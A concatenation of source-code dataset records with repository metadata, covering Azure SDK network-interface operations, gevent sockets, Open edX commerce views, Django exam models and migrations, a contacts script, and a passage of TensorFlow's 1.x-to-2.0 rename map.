] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 8,928 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfaceIPConfigurationsOperations:
"""NetworkInterfaceIPConfigurationsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_11_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
network_interface_name: str,
**kwargs
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get all ip configurations in a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_11_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get(
self,
resource_group_name: str,
network_interface_name: str,
ip_configuration_name: str,
**kwargs
) -> "_models.NetworkInterfaceIPConfiguration":
"""Gets the specified network interface ip configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration name.
:type ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_11_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
| [
"[email protected]"
] | |
e23182c952b026b3073f17d87b07c6f0b5a98c59 | e3ffd1f17819ab8a7b95b63f4a30cbbe85d7c44d | /week_4/contacts_short_41.py | 6a866c20b264e1243963c70d3d82ae7fb3e9efe3 | [] | no_license | jamesoneill54/programming_2 | 77d105f0eb3be7c1af3fe6ca89cf291aca4e0c95 | 8c8d7e4551894b773f52ee1e4785fe324b974ac9 | refs/heads/master | 2021-01-22T04:18:22.654154 | 2017-05-25T23:46:31 | 2017-05-25T23:46:31 | 92,451,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | import sys
with open(sys.argv[1], 'r') as f:
contacts = {}
for line in f:
[name, phone] = line.strip().split()
contacts[name] = phone
for line in sys.stdin:
if line.strip() in contacts:
print('Name:', line.strip())
print('Phone:', contacts[line.strip()])
else:
print('Name:', line.strip())
print('No such contact') | [
"[email protected]"
] | |
57790357a11b82f693fabb647bd204391e2a5368 | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/commerce/api/v1/views.py | c85719eccde259580a7818f846c5cf0d12d2b7f5 | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 3,600 | py | """
Commerce views
"""
import logging
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.http import Http404
from edx_rest_api_client import exceptions
from edx_rest_framework_extensions.auth.jwt.authentication import JwtAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.generics import ListAPIView, RetrieveUpdateAPIView
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.util.json_request import JsonResponse
from openedx.core.djangoapps.commerce.utils import ecommerce_api_client
from openedx.core.lib.api.authentication import BearerAuthentication
from openedx.core.lib.api.mixins import PutAsCreateMixin
from ...utils import is_account_activation_requirement_disabled
from .models import Course
from .permissions import ApiKeyOrModelPermission, IsAuthenticatedOrActivationOverridden
from .serializers import CourseSerializer
log = logging.getLogger(__name__)
class CourseListView(ListAPIView):
""" List courses and modes. """
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = CourseSerializer
pagination_class = None
def get_queryset(self):
return list(Course.iterator())
class CourseRetrieveUpdateView(PutAsCreateMixin, RetrieveUpdateAPIView):
""" Retrieve, update, or create courses/modes. """
lookup_field = 'id'
lookup_url_kwarg = 'course_id'
model = CourseMode
authentication_classes = (JwtAuthentication, BearerAuthentication, SessionAuthentication,)
permission_classes = (ApiKeyOrModelPermission,)
serializer_class = CourseSerializer
# Django Rest Framework v3 requires that we provide a queryset.
# Note that we're overriding `get_object()` below to return a `Course`
# rather than a CourseMode, so this isn't really used.
queryset = CourseMode.objects.all()
def get_object(self, queryset=None): # lint-amnesty, pylint: disable=arguments-differ, unused-argument
course_id = self.kwargs.get(self.lookup_url_kwarg)
course = Course.get(course_id)
if course:
return course
raise Http404
def pre_save(self, obj):
# There is nothing to pre-save. The default behavior changes the Course.id attribute from
# a CourseKey to a string, which is not desired.
pass
class OrderView(APIView):
""" Retrieve order details. """
authentication_classes = (JwtAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticatedOrActivationOverridden,)
def get(self, request, number):
""" HTTP handler. """
# If the account activation requirement is disabled for this installation, override the
# anonymous user object attached to the request with the actual user object (if it exists)
if not request.user.is_authenticated and is_account_activation_requirement_disabled():
try:
request.user = User.objects.get(id=request.session._session_cache['_auth_user_id']) # lint-amnesty, pylint: disable=protected-access
except User.DoesNotExist:
return JsonResponse(status=403)
try:
order = ecommerce_api_client(request.user).orders(number).get()
return JsonResponse(order)
except exceptions.HttpNotFoundError:
return JsonResponse(status=404)
| [
"[email protected]"
] | |
a8b587769f572f0e5f80a0878307423b27a05b90 | 28aed3120411fd7558fc08b47274f5ced5d5069c | /UIAutomation/tests/Utils/test_envsettingreader.py | c9533f87b7fe7e555380cf537766a0f96e5fc602 | [
"MIT",
"Apache-2.0"
] | permissive | SirCYong/long_long_ago | 8e181310267836774b50824e873adb7959f80080 | 6dfe9a9eb9d0f25a55bccd22b66878bde1a2fd6b | refs/heads/master | 2020-03-16T02:58:18.161981 | 2018-05-07T15:17:54 | 2018-05-07T15:17:54 | 132,477,192 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | import unittest
from nose.tools import assert_equal
from UIAutomation.Utils import get_setting_configuration, get_env_script_runs_on
class TestEnvSettingReader(unittest.TestCase):
def test_get_setting_configuration(self):
assert_equal('Android', get_setting_configuration('android', 'platformName'))
assert_equal('.activity.base.LauncherActivity', get_setting_configuration('android', 'appActivity'))
assert_equal('com.iscs.SmallAnimal', get_setting_configuration('ios', 'bundleId'))
def test_get_env_script_runs_on(self):
assert get_env_script_runs_on().lower() == 'cit' or get_env_script_runs_on().lower() == 'sit'
| [
"[email protected]"
] | |
fd642025117c7bf558857ee67a8ba489a67f97f8 | 1ab7b3f2aa63de8488ce7c466a67d367771aa1f2 | /Ricardo_OS/Python_backend/venv/lib/python3.8/site-packages/gevent/_socket2.py | 537676c22624f54f5cdf951c1f488cd19b22b941 | [
"MIT"
] | permissive | icl-rocketry/Avionics | 9d39aeb11aba11115826fd73357b415026a7adad | 95b7a061eabd6f2b607fba79e007186030f02720 | refs/heads/master | 2022-07-30T07:54:10.642930 | 2022-07-10T12:19:10 | 2022-07-10T12:19:10 | 216,184,670 | 9 | 1 | MIT | 2022-06-27T10:17:06 | 2019-10-19T09:57:07 | C++ | UTF-8 | Python | false | false | 11,598 | py | # Copyright (c) 2009-2014 Denis Bilenko and gevent contributors. See LICENSE for details.
"""
Python 2 socket module.
"""
from __future__ import absolute_import
from __future__ import print_function
# Our import magic sadly makes this warning useless
# pylint: disable=undefined-variable
import sys
from gevent import _socketcommon
from gevent._util import copy_globals
from gevent._compat import PYPY
copy_globals(_socketcommon, globals(),
names_to_ignore=_socketcommon.__py3_imports__ + _socketcommon.__extensions__,
dunder_names_to_keep=())
__socket__ = _socketcommon.__socket__
__implements__ = _socketcommon._implements
__extensions__ = _socketcommon.__extensions__
__imports__ = [i for i in _socketcommon.__imports__ if i not in _socketcommon.__py3_imports__]
__dns__ = _socketcommon.__dns__
try:
_fileobject = __socket__._fileobject
except AttributeError:
# Allow this module to be imported under Python 3
# for building the docs
_fileobject = object
else:
# Python 2 doesn't natively support with statements on _fileobject;
# but it substantially eases our test cases if we can do the same with on both Py3
# and Py2. (For this same reason we make the socket itself a context manager.)
# Implementation copied from Python 3
assert not hasattr(_fileobject, '__enter__')
# we could either patch in place:
#_fileobject.__enter__ = lambda self: self
#_fileobject.__exit__ = lambda self, *args: self.close() if not self.closed else None
# or we could subclass. subclassing has the benefit of not
# changing the behaviour of the stdlib if we're just imported; OTOH,
# under Python 2.6/2.7, test_urllib2net.py asserts that the class IS
# socket._fileobject (sigh), so we have to work around that.
# We also make it call our custom socket closing method that disposes
# of IO watchers but not the actual socket itself.
# Python 2 relies on reference counting to close sockets, so this is all
# very ugly and fragile.
class _fileobject(_fileobject): # pylint:disable=function-redefined
__slots__ = (
'__weakref__',
)
def __enter__(self):
return self
def __exit__(self, *args):
if not self.closed:
self.close()
def close(self):
if self._sock is not None:
self._sock._drop_events_and_close(closefd=False)
super(_fileobject, self).close()
class _closedsocket(object):
__slots__ = ()
def _dummy(*args, **kwargs): # pylint:disable=no-method-argument,unused-argument
raise error(EBADF, 'Bad file descriptor')
# All _delegate_methods must also be initialized here.
send = recv = recv_into = sendto = recvfrom = recvfrom_into = _dummy
def __nonzero__(self):
return False
__bool__ = __nonzero__
if PYPY:
def _drop(self):
pass
def _reuse(self):
pass
__getattr__ = _dummy
gtype = type
_Base = _socketcommon.SocketMixin
class socket(_Base):
"""
gevent `socket.socket <https://docs.python.org/2/library/socket.html#socket-objects>`_
for Python 2.
This object should have the same API as the standard library socket linked to above. Not all
methods are specifically documented here; when they are they may point out a difference
to be aware of or may document a method the standard library does not.
.. versionchanged:: 1.5.0
This object is a context manager, returning itself, like in Python 3.
"""
# pylint:disable=too-many-public-methods
__slots__ = (
)
def __init__(self, family=AF_INET, type=SOCK_STREAM, proto=0, _sock=None):
_Base.__init__(self)
timeout = _socket.getdefaulttimeout()
if _sock is None:
self._sock = _realsocket(family, type, proto)
else:
if hasattr(_sock, '_sock'):
timeout = getattr(_sock, 'timeout', timeout)
while hasattr(_sock, '_sock'):
# passed a gevent socket or a native
# socket._socketobject. Unwrap this all the way to the
# native _socket.socket.
_sock = _sock._sock
self._sock = _sock
if PYPY:
self._sock._reuse()
self.timeout = timeout
self._sock.setblocking(0)
fileno = self._sock.fileno()
self.hub = get_hub()
io = self.hub.loop.io
self._read_event = io(fileno, 1)
self._write_event = io(fileno, 2)
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __repr__(self):
return '<%s at %s %s>' % (type(self).__name__, hex(id(self)), self._formatinfo())
def __str__(self):
return '<%s %s>' % (type(self).__name__, self._formatinfo())
def _formatinfo(self):
# pylint:disable=broad-except
try:
fileno = self.fileno()
except Exception as ex:
fileno = str(ex)
try:
sockname = self.getsockname()
sockname = '%s:%s' % sockname
except Exception:
sockname = None
try:
peername = self.getpeername()
peername = '%s:%s' % peername
except Exception:
peername = None
result = 'fileno=%s' % fileno
if sockname is not None:
result += ' sock=' + str(sockname)
if peername is not None:
result += ' peer=' + str(peername)
if getattr(self, 'timeout', None) is not None:
result += ' timeout=' + str(self.timeout)
return result
def accept(self):
while 1:
try:
client_socket, address = self._sock.accept()
break
except error as ex:
if ex.args[0] != EWOULDBLOCK or self.timeout == 0.0:
raise
sys.exc_clear()
self._wait(self._read_event)
sockobj = socket(_sock=client_socket)
if PYPY:
client_socket._drop()
return sockobj, address
def _drop_ref_on_close(self, sock):
# See the same method in _socket3.py. We just can't be as deterministic
# as we can on Python 3.
scheduled_new = self.hub.loop.closing_fd(sock.fileno())
if PYPY:
meth = sock._drop
else:
meth = sock.fileno # Still keep it alive if we need to
if scheduled_new:
self.hub.loop.run_callback(meth)
else:
meth()
def close(self, _closedsocket=_closedsocket):
if not self._sock:
return
# This function should not reference any globals. See Python issue #808164.
# First, break any reference to the loop.io objects. Our
# fileno, which they were tied to, is about to be free to be
# reused, so these objects are no longer functional.
self._drop_events_and_close()
# Next, change self._sock. On CPython, this drops a
# reference, and if it was the last reference, __del__ will
# close it. (We cannot close it, makefile() relies on
# reference counting like this, and it may be shared among
# multiple wrapper objects). Methods *must not* cache
# `self._sock` separately from
# self._write_event/self._read_event, or they will be out of
# sync and we may get inappropriate errors. (See
# test__hub:TestCloseSocketWhilePolling for an example).
self._sock = _closedsocket()
@property
def closed(self):
return isinstance(self._sock, _closedsocket)
def dup(self):
"""dup() -> socket object
Return a new socket object connected to the same system resource.
Note, that the new socket does not inherit the timeout."""
return socket(_sock=self._sock)
def makefile(self, mode='r', bufsize=-1):
# Two things to look out for:
# 1) Closing the original socket object should not close the
# fileobject (hence creating a new socket instance);
# An alternate approach is what _socket3.py does, which is to
# keep count of the times makefile objects have been opened (Py3's
# SocketIO helps with that). But the newly created socket, which
# has its own read/write watchers, does need those to be closed
# when the fileobject is; our custom subclass does that. Note that
# we can't pass the 'close=True' argument, as that causes reference counts
# to get screwed up, and Python2 sockets rely on those.
# 2) The resulting fileobject must keep the timeout in order
# to be compatible with the stdlib's socket.makefile.
# Pass self as _sock to preserve timeout.
fobj = _fileobject(type(self)(_sock=self), mode, bufsize)
if PYPY:
self._sock._drop()
return fobj
def sendall(self, data, flags=0):
if isinstance(data, unicode):
data = data.encode()
return _Base.sendall(self, data, flags)
if PYPY:
def _reuse(self):
self._sock._reuse()
def _drop(self):
self._sock._drop()
SocketType = socket
if hasattr(_socket, 'socketpair'):
# The native, low-level socketpair returns
# low-level objects
def socketpair(family=getattr(_socket, 'AF_UNIX', _socket.AF_INET),
type=_socket.SOCK_STREAM, proto=0):
one, two = _socket.socketpair(family, type, proto)
result = socket(_sock=one), socket(_sock=two)
if PYPY:
one._drop()
two._drop()
return result
elif hasattr(__socket__, 'socketpair'):
# The high-level backport uses high-level socket APIs. It works
# cooperatively automatically if we're monkey-patched,
# else we must do it ourself.
_orig_socketpair = __socket__.socketpair
def socketpair(family=_socket.AF_INET, type=_socket.SOCK_STREAM, proto=0):
one, two = _orig_socketpair(family, type, proto)
if not isinstance(one, socket):
one = socket(_sock=one)
two = socket(_sock=two)
if PYPY:
one._drop()
two._drop()
return one, two
elif 'socketpair' in __implements__:
__implements__.remove('socketpair')
if hasattr(_socket, 'fromfd'):
def fromfd(fd, family, type, proto=0):
s = _socket.fromfd(fd, family, type, proto)
result = socket(_sock=s)
if PYPY:
s._drop()
return result
elif 'fromfd' in __implements__:
__implements__.remove('fromfd')
if hasattr(__socket__, 'ssl'):
def ssl(sock, keyfile=None, certfile=None):
# deprecated in 2.7.9 but still present;
# sometimes backported by distros. See ssl.py
# Note that we import gevent.ssl, not _ssl2, to get the correct
# version.
from gevent import ssl as _sslmod
# wrap_socket is 2.7.9/backport, sslwrap_simple is older. They take
# the same arguments.
wrap = getattr(_sslmod, 'wrap_socket', None) or getattr(_sslmod, 'sslwrap_simple')
return wrap(sock, keyfile, certfile)
__implements__.append('ssl')
if hasattr(__socket__, 'sethostname'):
# This was added in 3.3, but PyPy 2.7-7.3.2
# leaked it back into Python 2.
sethostname = __socket__.sethostname
__imports__.append('sethostname')
__all__ = __implements__ + __extensions__ + __imports__
| [
"[email protected]"
] | |
c90939194ffd9a0ae033eda433c4412b90e34be4 | 2bcc6c45a28251dcde72bb8b003b5592350dc208 | /exams/models.py | 5909bafe70117024d9487d86d13b9a60bbab0dba | [] | no_license | amanjhurani/university_dost | 153d1a245df4338be60df3e9980e0238408e40ad | 41f6119c88d36f0153fbf1a5be1913e2c45d9751 | refs/heads/master | 2021-10-08T22:23:42.252577 | 2018-12-18T11:22:10 | 2018-12-18T11:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,291 | py | from django.urls import reverse
from config.settings.base import AUTH_USER_MODEL
from django.db import models
from universities.models import Subject
from config.utils import random_string_generator
from markdownx.models import MarkdownxField
class Exam(models.Model):
# Choices
MONTH_CHOICES = (
('january', 'January'),
('february', 'February'),
('march', 'March'),
('april', 'April'),
('may', 'May'),
('june', 'June'),
('july', 'July'),
('august', 'August'),
('september', 'September'),
('october', 'October'),
('november', 'November'),
('december', 'December')
)
TERM_CHOICES = (
('summer', 'Summer'),
('winter', 'Winter')
)
# Fields
month = models.CharField(max_length=128, choices=MONTH_CHOICES)
year = models.CharField(max_length=4)
term = models.CharField(max_length=12, choices=TERM_CHOICES)
date = models.DateField()
total_time = models.CharField(max_length=12)
total_marks = models.IntegerField()
exam_code = models.CharField(max_length=128, blank=True, null=True)
exam_complete = models.BooleanField(default=False)
# Relationship Fields
subject = models.ForeignKey(
Subject, on_delete=models.CASCADE
)
class Meta:
ordering = ('-pk',)
def save(self, *args, **kwargs):
if self.exam_code and len(self.exam_code.split('-')) > 3:
self.exam_code = self.exam_code.split('-')[3]
self.exam_code = '{}-{}'.format(
self.subject.subject_code,
random_string_generator(size=5)
)
qs_exists = Exam.objects.filter(exam_code=self.exam_code).exists()
if qs_exists:
self.exam_code = '{}-{}'.format(self.subject.subject_code,
random_string_generator(size=5))
super(Exam, self).save(*args, **kwargs)
def __str__(self):
return self.subject.name + " " + self.term + "-" + self.year
def get_absolute_url(self):
return reverse('exams_exam_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_exam_update', args=(self.pk,))
class Question(models.Model):
# Choices
QUESTION_TYPE_CHOICES = (
('mcq', 'MCQ'),
('short_question', 'Short Question'),
('descriptive_question', 'Descriptive Question'),
)
# Fields
question_code = models.CharField(max_length=128, blank=True, null=True)
question_number = models.CharField(max_length=128)
question_body = MarkdownxField()
question_type = models.CharField(
max_length=12, choices=QUESTION_TYPE_CHOICES)
answer = MarkdownxField(blank=True, null=True)
explanation = MarkdownxField(blank=True, null=True)
marks = models.IntegerField()
upvote = models.IntegerField(default=0)
downvote = models.IntegerField(default=0)
# Relationship Fields
exam = models.ForeignKey(
Exam, on_delete=models.CASCADE
)
author = models.ForeignKey(
AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL
)
class Meta:
ordering = ('-pk',)
def save(self, *args, **kwargs):
if len(self.question_code.split('-')) > 4:
self.question_code = self.question_code.split('-')[4]
self.question_code = '{}-{}'.format(
self.exam.exam_code,
self.question_code
)
super(Question, self).save(*args, **kwargs)
def __str__(self):
return (self.question_number +
" | " + self.exam.term +
"-" + self.exam.year
)
def get_absolute_url(self):
return reverse('exams_question_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_question_update', args=(self.pk,))
class AnswerFeedback(models.Model):
# Choices
FEEDBACK_TYPE_CHOICES = (
('wrong_answer', 'Wrong Answer'),
('improvement', 'Improvement'),
)
FEEDBACK_STATUS_CHOICES = (
('received', 'Received'),
('reviewing', 'Reviewing'),
('reviewed', 'Reviewed'),
('resolved', 'Resolved')
)
# Fields
feedback_title = models.CharField(max_length=256, blank=True, null=True)
feedback_body = models.TextField()
feedback_type = models.CharField(
max_length=128, choices=FEEDBACK_TYPE_CHOICES)
feedback_status = models.CharField(
max_length=128,
choices=FEEDBACK_STATUS_CHOICES,
default='received')
user_email = models.EmailField(max_length=256, blank=True, null=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
# Relationship Fields
question = models.ForeignKey(
Question, on_delete=models.CASCADE
)
user = models.ForeignKey(
AUTH_USER_MODEL, blank=True, null=True, on_delete=models.SET_NULL
)
class Meta:
ordering = ('-pk',)
def __str__(self):
return self.feedback_title
def get_absolute_url(self):
return reverse('exams_answerfeedback_detail', args=(self.pk,))
def get_update_url(self):
return reverse('exams_answerfeedback_update', args=(self.pk,))
| [
"[email protected]"
] | |
49f552812ae2ebc0e2cb7111c0f72e6044fd22b7 | d96f75610758fd6e193d575a2c5ba72c420d90e8 | /blog/migrations/0001_initial.py | ae82676f9c48d490aaed6c97ff64cd7594a38393 | [] | no_license | barlapelican/my-first-blog | 4a20ef5f3723209225510436513321b10b5d9fcf | 1594006935765d288434d4542502deb3e954f974 | refs/heads/master | 2020-06-17T06:06:07.116828 | 2019-07-08T13:53:25 | 2019-07-08T13:53:25 | 195,823,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | # Generated by Django 2.0.13 on 2019-07-08 13:06
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
30e036da1644eb5fa3fbcdbdf92476a5bda2a487 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/tools/compatibility/all_renames_v2.py | 297539c1e7d028c31244a3e2161e48ceaf3be0a9 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 25,028 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides a list of renames between TensorFlow 1.* and 2.0."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.tools.compatibility import renames_v2
# pylint: disable=line-too-long
# Add additional renames not in renames_v2.py here.
# IMPORTANT: For the renames in here, if you also need to add to
# function_reorders or function_keyword_renames in tf_upgrade_v2.py,
# use the OLD function name.
# These renames happen after the arguments have been processed.
manual_symbol_renames = {
"tf.batch_to_space_nd":
"tf.batch_to_space",
"tf.batch_gather":
"tf.compat.v1.batch_gather",
"tf.space_to_batch_nd":
"tf.space_to_batch",
"tf.nn.space_to_batch":
"tf.space_to_batch",
"tf.estimator.inputs":
"tf.compat.v1.estimator.inputs",
"tf.extract_image_patches":
"tf.image.extract_patches",
"tf.image.extract_image_patches":
"tf.image.extract_patches",
"tf.gfile.Copy":
"tf.io.gfile.copy",
"tf.gfile.DeleteRecursively":
"tf.io.gfile.rmtree",
"tf.gfile.Exists":
"tf.io.gfile.exists",
"tf.gfile.Glob":
"tf.io.gfile.glob",
"tf.gfile.GFile":
"tf.io.gfile.GFile",
"tf.gfile.IsDirectory":
"tf.io.gfile.isdir",
"tf.gfile.ListDirectory":
"tf.io.gfile.listdir",
"tf.gfile.MakeDirs":
"tf.io.gfile.makedirs",
"tf.gfile.MkDir":
"tf.io.gfile.mkdir",
"tf.gfile.Open":
"tf.io.gfile.GFile",
"tf.gfile.Remove":
"tf.io.gfile.remove",
"tf.gfile.Rename":
"tf.io.gfile.rename",
"tf.gfile.Stat":
"tf.io.gfile.stat",
"tf.gfile.Walk":
"tf.io.gfile.walk",
"tf.contrib.cluster_resolver.ClusterResolver":
"tf.distribute.cluster_resolver.ClusterResolver",
"tf.contrib.cluster_resolver.GceClusterResolver":
"tf.distribute.cluster_resolver.GCEClusterResolver",
"tf.contrib.cluster_resolver.KubernetesClusterResolver":
"tf.distribute.cluster_resolver.KubernetesClusterResolver",
"tf.contrib.cluster_resolver.SimpleClusterResolver":
"tf.distribute.cluster_resolver.SimpleClusterResolver",
"tf.contrib.cluster_resolver.SlurmClusterResolver":
"tf.distribute.cluster_resolver.SlurmClusterResolver",
"tf.contrib.cluster_resolver.TFConfigClusterResolver":
"tf.distribute.cluster_resolver.TFConfigClusterResolver",
"tf.contrib.cluster_resolver.TPUClusterResolver":
"tf.distribute.cluster_resolver.TPUClusterResolver",
"tf.contrib.cluster_resolver.UnionClusterResolver":
"tf.distribute.cluster_resolver.UnionClusterResolver",
"tf.contrib.data.AUTOTUNE":
"tf.data.experimental.AUTOTUNE",
"tf.contrib.data.Counter":
"tf.data.experimental.Counter",
